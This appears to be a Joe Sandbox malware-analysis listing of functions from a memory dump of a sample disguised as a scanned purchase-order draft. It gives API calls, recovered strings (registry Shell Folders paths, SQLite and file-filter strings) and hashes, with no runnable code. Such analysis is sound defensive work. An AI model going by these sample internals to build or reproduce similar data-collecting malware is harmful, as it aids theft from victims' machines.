                                                                                • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                APIs
                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                • memset.MSVCRT ref: 0040C439
                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                • _wcsupr.MSVCRT ref: 0040C481
                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                • memset.MSVCRT ref: 0040C4D0
                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                • String ID:
                                                                                • API String ID: 4131475296-0
                                                                                • Opcode ID: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                                                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                • Opcode Fuzzy Hash: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                                                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004116FF
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                • API String ID: 2618321458-3614832568
                                                                                • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFilefreememset
                                                                                • String ID:
                                                                                • API String ID: 2507021081-0
                                                                                • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                APIs
                                                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                • malloc.MSVCRT ref: 00417524
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                • free.MSVCRT ref: 00417544
                                                                                • free.MSVCRT ref: 00417562
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                • String ID:
                                                                                • API String ID: 4131324427-0
                                                                                • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                APIs
                                                                                • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                • free.MSVCRT ref: 0041822B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: PathTemp$free
                                                                                • String ID: %s\etilqs_$etilqs_
                                                                                • API String ID: 924794160-1420421710
                                                                                • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040FDD5
                                                                                  • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                • API String ID: 1775345501-2769808009
                                                                                • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                APIs
                                                                                • wcscpy.MSVCRT ref: 0041477F
                                                                                • wcscpy.MSVCRT ref: 0041479A
                                                                                • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: wcscpy$CloseCreateFileHandle
                                                                                • String ID: General
                                                                                • API String ID: 999786162-26480598
                                                                                • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                • _snwprintf.MSVCRT ref: 0040977D
                                                                                • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                • String ID: Error$Error %d: %s
                                                                                • API String ID: 313946961-1552265934
                                                                                • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: foreign key constraint failed$new$oid$old
                                                                                • API String ID: 0-1953309616
                                                                                • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                APIs
                                                                                Strings
                                                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                • API String ID: 3510742995-272990098
                                                                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0044A6EB
                                                                                • memset.MSVCRT ref: 0044A6FB
                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset
                                                                                • String ID: gj
                                                                                • API String ID: 1297977491-4203073231
                                                                                • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                APIs
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                • free.MSVCRT ref: 0040E9D3
                                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$free
                                                                                • String ID:
                                                                                • API String ID: 2241099983-0
                                                                                • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                APIs
                                                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                • malloc.MSVCRT ref: 004174BD
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                • free.MSVCRT ref: 004174E4
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                • String ID:
                                                                                • API String ID: 4053608372-0
                                                                                • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                APIs
                                                                                • GetParent.USER32(?), ref: 0040D453
                                                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                • String ID:
                                                                                • API String ID: 4247780290-0
                                                                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                APIs
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                • memset.MSVCRT ref: 004450CD
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                • String ID:
                                                                                • API String ID: 1471605966-0
                                                                                • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                APIs
                                                                                • wcscpy.MSVCRT ref: 0044475F
                                                                                • wcscat.MSVCRT ref: 0044476E
                                                                                • wcscat.MSVCRT ref: 0044477F
                                                                                • wcscat.MSVCRT ref: 0044478E
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
